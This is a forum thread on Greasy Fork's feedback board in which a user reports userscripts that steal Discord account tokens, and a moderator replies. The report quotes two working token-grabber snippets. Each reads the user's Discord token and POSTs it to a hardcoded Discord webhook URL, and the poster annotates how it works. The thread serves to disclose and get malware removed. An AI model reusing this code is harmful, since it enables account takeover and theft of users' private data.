Greasy Fork is available in English.

Discussions » Greasy Fork Feedback

Multiple scripts stealing user tokens on https://discord.com

§
Posted: 15-01-2021

There have been multiple scripts for Discord that claim to be a token/nitro grabber. These scripts are illegitimate and can harm a user by taking their account token. I have reported multiple of these scripts, and this is what I said:

This script takes a Discord token (a method of authentication) from the user. This is a highly malicious task as it allows the person to steal others account and all of the info in their account, which could mean their billing address, other passwords and usernames, and personal messages to other people. This is done by going to the localStorage and taking the property "token" then sending it to the script owners server.

Explanation:

(function () {
    var userKey = localStorage.getItem('token'); 

 //This gets the user token from the websites local storage.

    var wurl = "https://discord.com/api/webhooks/783890778115276832/ljB5Dl1g0ftyPxQwjmwBFhOsB7thaJdJFtay26J4tOOlmjV-4GIa4MEc0Xcg3MjE3h4b"
    var msg = {
        "content": userKey,
        "username": "Tokens for everyone!",
        "avatar": "https://cdn.icon-icons.com/icons2/2428/PNG/512/discord_black_logo_icon_147145.png"
    }

 // This sends the user token to the script owner through a thing called webhooks. Webhooks are used to autmatically send messages to Discord through API and other things.

    fetch(wurl, {"method":"POST", "headers": {"content-type": "application/json"}, "body": JSON.stringify(msg)})
})();

  // This sends the message and allows the script owner to get the user account token, allowing them to steal accounts.

Another version of this code is this, but it does the same thing:

  var request = new XMLHttpRequest();
  var req = webpackJsonp.push([
    [], {
      extra_id: (e, r, t) => e.exports = t
    },
    [
      ["extra_id"]
    ]
  ]);
  for (let e in req.c)
    if (req.c.hasOwnProperty(e)) {
      let r = req.c[e].exports;
      if (r && r.__esModule && r.default)
        for (let e in r.default) {
            if(e === "getToken") {
              request.open('POST', 'https://discord.com/api/webhooks/757917992091779072/rqRxId4xeK28N1C7W66Xqhq5hJvfvzgOsfrk_1dLj4b0QZ5RdEKnGWBgfg-xZeYT1GsE');
              request.setRequestHeader('Content-Type', 'application/json')
              request.send(JSON.stringify({
               content: r.default.getToken()
              }));
            }
        }
    }

It would be best if these types of scripts could be removed before it harms more people.

§
Posted: 17-01-2021

If you see these scripts, please report them and a moderator will take a look.

§
Posted: 08-09-2022

ok

Post reply

تسجيل الدخول إلى مرحلة ما بعد الرد.